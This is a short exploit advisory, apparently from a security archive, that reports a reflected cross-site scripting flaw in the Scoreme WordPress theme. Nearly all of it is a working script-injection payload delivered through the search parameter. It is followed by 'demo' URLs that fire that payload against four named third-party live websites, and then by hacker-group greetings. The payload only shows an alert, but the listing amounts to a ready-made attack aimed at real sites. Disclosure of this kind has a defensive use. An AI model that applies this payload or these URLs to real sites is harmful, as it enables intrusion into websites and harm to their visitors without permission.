Scoreme Theme Cross Site Scripting

2016.03.28
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] Exploit Title : Scoreme Theme Cross Site Scripting Exploit Author : Iran Cyber Security Group Discovered By : 0xC3ph4l3x1n (0x3a) Link Download : www.wordpressfolio.com/blogmagazine-themes/scoreme-magazine-wordpress-theme-with-ratings/ Date : 28 March 2016 Tested On : Mozilla FireFox , Windows 10 [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [!] Cross Site Scripting (XSS) : [!] Payload : "/><script>alert(/XSS By 0x3a/);</script> Demo : gamemakerblog.com/?s="/><script>alert(/XSS By 0x3a/);</script> www.chroniclesofbrian.com/?s="/><script>alert(/XSS By 0x3a/);</script> www.sohailriaz.com/?s="/><script>alert(/XSS By 0x3a/);</script> cjlab.memri.org/?s=%"/><script>alert(/XSS By 0x3a/);</script>&__cf_waf_tk__=040073002AepZ-v4y-KpDxzUBIC65HaHJAYA [+][+][+][+][+][+][+] WWW.IRAN-CYBER.NET[+] [+][+][+][+][+][+][+] fr : MOHAMAD-NOFOZI , root3r , sir.h4m1d , m0hamad.black , whitewolf , mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n , nazanin_wild , 0xdevil GOOD LUCK </0x3a>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top